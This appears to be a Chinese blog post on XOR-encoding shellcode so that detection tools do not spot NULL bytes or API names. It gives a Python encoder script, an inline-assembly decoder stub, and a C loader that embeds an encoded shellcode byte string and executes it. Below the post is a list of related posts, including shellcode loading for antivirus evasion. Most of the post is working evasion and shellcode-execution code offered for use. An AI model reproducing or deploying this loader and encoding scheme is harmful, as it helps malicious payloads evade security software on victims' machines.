shellcode编码
shellcode没有被编码,如果shellcode中存在NULL、函数名也有可能被检测到,所以有必要对shell code进行编码。
首先将shellcode编码
#!/usr/bin/env python
import os
s=''
data = bytes(open('d:\\1.txt','rb').read(1000))
for ch in data:s+='\\'+hex(ord(ch)^0x34)[1:]
print len(s),s然后获取解密code
_asm{add eax,0x16 ;此偏移是解密代码长度xor ecx,ecx
decrypt:movsx bl,byte ptr[eax+ecx]xor bl,0x34mov [eax+ecx],blinc ecx cmp bl,0x90jne decrypt}最后试运行一下,成功
int main(){char shellcode[]="\x83\xc0\x16\x33\xc9\x66\xf\xbe\x1c\x8\x80\xf3\x34\x88\x1c\x8\x41\x80\xfb\x90\x75\xef""\xc8\x5c\x5e\x3e\xc\x2a\x5c\x57\xbd\xe5\x7b\x5c\x6\x40\xa5\x38\xbf\xc0\xb9\x4a\xc0\x7""\xef\x83\x30\x1f\xd7\x52\x8f\x7\x6\x67\x5c\x41\x47\x51\x46\x60\x7\xe6\x50\xbf\x6e\x4""\xbf\x7f\x38\xbf\x7d\x28\xbf\x3d\xbf\x5d\x3c\x99\x9\x5e\x3e\xc\x2a\x41\x31\xa1\xcb\x63""\xcc\xa1\x54\xbf\x71\x8\xbf\x78\x31\x4c\x37\xf9\xbf\x6d\x14\x37\xe9\x7\xcb\x73\xbf\x0""\x8f\x37\xc1\xad\x3b\x8a\x32\xe\xf0\x40\x3c\xf5\xfe\x33\x37\xe4\x72\xdf\xc5\xf\x60""\x10\x28\x41\xd0\xbf\x6d\x10\x37\xe9\x52\xbf\x8\x4f\xbf\x6d\x28\x37\xe9\x37\x18\x8f""\xa1\x6b\x9f\x63\x55\x9\x5e\x3e\xc\x2a\x41\x9d\x7\xef\x67\x5c\x43\x51\x47\x40\x5c\x52""\x55\x5d\x58\xbf\xf0\x67\x64\x64\x67\xcb\x63\xc8\x67\xcb\x63\xcc\xa4\xa4";_asm{lea eax,shellcodepush eaxret}return 0;
}shellcode编码相关推荐
- shellcode 编码技术
在很多漏洞利用场景中, shellcode 的内容将会受到限制. 例如你不能输入 \x00 这个字符,编辑框不能输入 \x0d \x0a这样的字符 所以需要完成 shellcode 的逻辑,然后使用编 ...
- 大型计算机变形,ShellCode编码变形大法 -电脑资料
现在的很多有溢出漏洞的程序对ShellCode都有特定的要求,一类是对ShellCode的长度大小有限制:另一类就是不能出现某些特殊字符,比如Cmail漏洞不能有大写字母啊,Foxmail不能有0x2 ...
- 3.6 shellcode编码技术
目录 一.为什么需要对shellcode进行编码? 二.实验环境 三.实验步骤 一.为什么需要对shellcode进行编码? 主要原因有: (1)所有的字符串函数都会对NULL字节进行限制,为此,我们 ...
- python加载shellcode免杀 简介
目录 前言 0X00 基础概念 1. python ctypes模块介绍 2. dll动态链接库 3. pyinstaller 4. shellcode 5.关于windows defender 6 ...
- shellcode学习总结
shellcode Shellcode实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码,一般可以获取权限.另外,Shellcode一般是作为数据发送给受攻击服务器的. Shel ...
- CTF中编码与加解密总结
CTF中那些脑洞大开的编码和加密 转自:https://www.cnblogs.com/mq0036/p/6544055.html 0x00 前言 正文开始之前先闲扯几句吧,玩CTF的小伙伴也许会遇到 ...
- CTF密码学-编码基础知识点总结
CTF密码学-编码基础知识点总结 0x01 目录 常见编码: 1.ASCII编码 2.Base64/32/16编码 3.shellcode编码 4.Quoted-printable编码 5.XXenc ...
- [CTF]中那些脑洞大开的编码和加密
[CTF]中那些脑洞大开的编码和加密 摘自:https://www.cnblogs.com/mq0036/p/6544055.html 0x00 前言 正文开始之前先闲扯几句吧,玩CTF的小伙伴也许会 ...
- CTF编码和加密总结
0x00 前言 本文转自来自精灵博客的CTF中那些脑洞大开的编码和加密,原文链接https://www.hackfun.org/CTF/coding-and-encryption-of-those-b ...
最新文章
- Django模型(二)
- Spring Boot devtool的使用
- 使用活动记录执行CRUD
- axios的content-type是自动设置的吗?
- 每天进步一点点《ML - 高斯混合模型》
- day00 -----博客作业1
- PHP实现微信公众平台开发---提升篇(access_token存session)
- 神奇的泡泡java游戏,抖音挤泡泡游戏叫什么名字 抖音上很火的减压游戏介绍
- 迭代期望和方差(iterated expectation,variance)
- 英雄联盟胜利因素分析
- 不小心把桌面进程结束了怎么办_点击任务管理器上的结束进程电脑桌面的图标都 – 手机爱问...
- 死亡计算机在线使用,抖音死亡计算器珍惜时间测试入口 抖音珍惜时间死亡计算器在线测试...
- vue_elementui拖住滑块拼图验证代码
- 5月18日第壹简报,星期三,农历四月十八
- android将图片做成视频播放,如何把图片做成视频【图文教程】
- Adnroid 使用安卓自带的人脸识别API
- Spring的原理分析
- android 视频录制 保存到本地
- 分布式计算、云计算与大数据第四章
- Mybatis : DEBUG [main] - PooledDataSource forcefully closed/removed all connections.